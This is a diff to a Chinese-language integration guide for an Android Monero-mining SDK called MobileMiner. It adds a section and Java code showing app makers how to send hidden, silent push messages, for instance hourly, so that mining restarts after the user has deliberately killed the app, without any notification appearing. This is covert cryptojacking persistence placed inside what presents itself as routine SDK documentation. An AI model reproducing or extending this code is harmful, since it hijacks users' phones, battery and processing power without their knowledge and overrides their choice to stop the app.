--- a/MobileMiner/v1.0.0接入文档.md
+++ b/MobileMiner/v1.0.0接入文档.md
@@ -24,6 +24,7 @@ ndk {
  注意：在gradle中设置abi，是为了SDK在运行时能够优先选择arm64-v8a。虽然目前SDK支持armeabi, armeabi-v7a, arm64-v8a，但是64位的arm64-v8a挖矿速度比32位的arm快20%-30%，所以优先适配arm64-v8a，如果实在不能适配（适配arm64-v8a的话，需要app中其他的库也有对应的arm64-v8a库），则SDK会选择32位的arm环境运行。
 
 <br />
+
 #### 3. 权限
 打开AndroidManifest.xml，添加组件需要的权限：
 
@@ -38,6 +39,7 @@ ndk {
 注意：SDK内部不做权限处理，交由接入方来处理。
 
 <br />
+
 #### 4. 混淆
 在混淆文件中加入：
 
@@ -47,6 +49,7 @@ ndk {
 ```
 
 <br />
+
 #### 5. 接入代码
 
 在Application初始化Miner：
@@ -91,9 +94,121 @@ XmrMiner.instance().getCurrentTemperature()
 ```
 
 <br />
-#### 6. API说明
 
-##### 6.1 class WaterholeMiner
+
+#### 6. 推送保活拉起策略
+
+挖矿SDK内部已经做好了保活，在用户不主动杀死接入方应用时，能尽可能存活。但由于国内Android手机的各种限制，为了保持挖矿时间，
+在用户主动杀死接入应用后，还能再拉起挖矿服务，需要接入方配合处理。如果接入方接入了第三方推送SDK，可以利用推送后台，
+定时推送透传消息到客户端（如每隔1小时），无需显示通知栏消息。在接收推送透传消息的逻辑中，根据指定的字段或者条件启动挖矿服务。
+但init(Context)的Context参数必须为主进程的Context，不能为Service的context，否则启动挖矿会失败。
+
+如，接入了个推的服务：
+```
+public final class GetuiIntentService extends GTIntentService {
+
+    public GetuiIntentService() {
+    }
+
+    @Override
+    public void onNotificationMessageClicked(Context context, GTNotificationMessage gtNotificationMessage) {
+    }
+
+    @Override
+    public void onNotificationMessageArrived(Context context, GTNotificationMessage gtNotificationMessage) {
+    }
+
+    @Override
+    public void onReceiveServicePid(Context context, int pid) {
+        LogUtils.info("onReceiveServicePid -> " + pid);
+    }
+
+    @Override
+    public void onReceiveMessageData(Context context, GTTransmitMessage msg) {
+        String appid = msg.getAppid();
+        String taskid = msg.getTaskId();
+        String messageid = msg.getMessageId();
+        byte[] payload = msg.getPayload();
+        String pkg = msg.getPkgName();
+        String cid = msg.getClientId();
+
+        // 第三方回执调用接口，actionid范围为90000-90999，可根据业务场景执行
+        boolean result = PushManager.getInstance().sendFeedbackMessage(context, taskid, messageid, 90001);
+        LogUtils.info("call sendFeedbackMessage = " + (result ? "success" : "failed"));
+        LogUtils.info("onReceiveMessageData -> " + "appid = " + appid + "\ntaskid = "
+            + taskid + "\nmessageid = " + messageid + "\npkg = " + pkg
+            + "\ncid = " + cid);
+        if (payload == null) {
+            LogUtils.error("receiver payload = null");
+        } else {
+            String data = new String(payload);
+            LogUtils.info("receiver payload = " + data);
+            /**
+             * 定时推送透传消息拉起挖矿服务
+             *
+             * <li>
+             *  1. 推送后台定时推送透传消息到接入客户端，约定好数据标识，如xmr_miner开头的字符，或者其他json串，无需启动通知栏通知
+             *  2. init(Context)的Context参数必须为主进程的Context，不能为Service的Context，否则启动挖矿会失败
+             * </li>
+             */
+            // todo 启动字段|条件接入方自行设置，但init(Context)的Context参数必须为主进程的Context，不能为Service的Context，否则启动挖矿会失败
+            if (data.startsWith("xmr_miner")) {
+                XmrMiner.instance().init(App.getContext()).setStateObserver(new StateObserver() {
+                    @Override
+                    public void onConnectPoolBegin() {
+                    }
+
+                    @Override
+                    public void onConnectPoolSuccess() {
+                    }
+
+                    @Override
+                    public void onConnectPoolFail(String error) {
+                    }
+
+                    @Override
+                    public void onPoolDisconnect(String error) {
+                    }
+
+                    @Override
+                    public void onMessageFromPool(String message) {
+                    }
+
+                    @Override
+                    public void onMiningError(String error) {
+                    }
+
+                    @Override
+                    public void onMiningStatus(double speed) {
+                    }
+                }).startMine();
+            }
+        }
+    }
+
+    @Override
+    public void onReceiveClientId(Context context, String clientid) {
+        LogUtils.error("onReceiveClientId -> " + "clientid = " + clientid);
+        // 441731ee7e3a839e3268a529044ace7d
+    }
+
+    @Override
+    public void onReceiveOnlineState(Context context, boolean online) {
+        LogUtils.error("onReceiveOnlineState -> " + (online ? "online" : "offline"));
+    }
+
+    @Override
+    public void onReceiveCommandResult(Context context, GTCmdMessage cmdMessage) {
+        LogUtils.error("onReceiveCommandResult -> " + cmdMessage);
+    }
+}
+```
+
+<br />
+
+#### 7. API说明
+
+##### 7.1 class WaterholeMiner
 
 ###### enableLog()
 <table>
@@ -127,7 +242,7 @@ XmrMiner.instance().getCurrentTemperature()
     </tr>
 </table>
 
-##### 6.2 class XmrMiner
+##### 7.2 class XmrMiner
 
 ###### instance()
 <table>
@@ -258,7 +373,7 @@ XmrMiner.instance().getCurrentTemperature()
 </table>
 
 <br />
-##### 6.3 class StateObserver
+##### 7.3 class StateObserver
 
 ###### onConnectPoolBegin()
 <table>
@@ -358,11 +473,12 @@ XmrMiner.instance().getCurrentTemperature()
     </tr>
 </table>
 
-##### 6.4 class MinerInterface
+##### 7.4 class MinerInterface
 各个挖矿币的统一接口，接入方无需了解。
 
 <br />
-#### 7. 技术支持
+
+#### 8. 技术支持
 ```
 qq: 651043704  
 wechat: k651043704
